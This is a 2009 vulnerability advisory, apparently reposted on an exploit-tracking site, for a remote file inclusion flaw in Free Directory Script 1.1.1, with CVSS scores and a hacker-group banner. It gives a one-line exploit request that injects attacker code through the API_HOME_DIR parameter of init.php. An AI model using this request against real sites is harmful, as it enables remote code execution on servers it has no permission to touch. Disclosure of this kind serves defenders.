Free Directory Script 1.1.1 (API_HOME_DIR) RFI Vulnerability

2009.03.01
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#################################################################################################### # Directory v1.1.1 (API_HOME_DIR) RFI Vulnerablity # # © Ghost Hacker , Real Hack Back :) # #################################################################################################### #[~] Author : Ghost Hacker # #[~] Homepage : www.Real-h.com [Real Hack Back] # #[~] Contact Me : Ghost-r00t[at]Hotmail[dot]com # #[~] Bug : RFI # #[~] From : Kingdom Saudi Arabia # #[~] Name Script : Directory v1.1.1 # #[~] Download : http://www.freedirectoryscript.com/download/fds-v111-rc.zip # #################################################################################################### #[~] Exploit : # # init.php?API_HOME_DIR=Evil_Code # #################################################################################################### #[~]GreetZ : # # Mr.SaFa7 , Mr-3sheq , aBo3tB , Night Mare , Root Hacker , Dmar al3noOoz # # Mr.MN7oS , Mr.Hope , Scary.Hacker , Qabandi , v4-team.com # # All Members Real Hack , All My Friends :) # #################################################################################################### # Viva Real Hack - Real-h.com .. # ####################################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top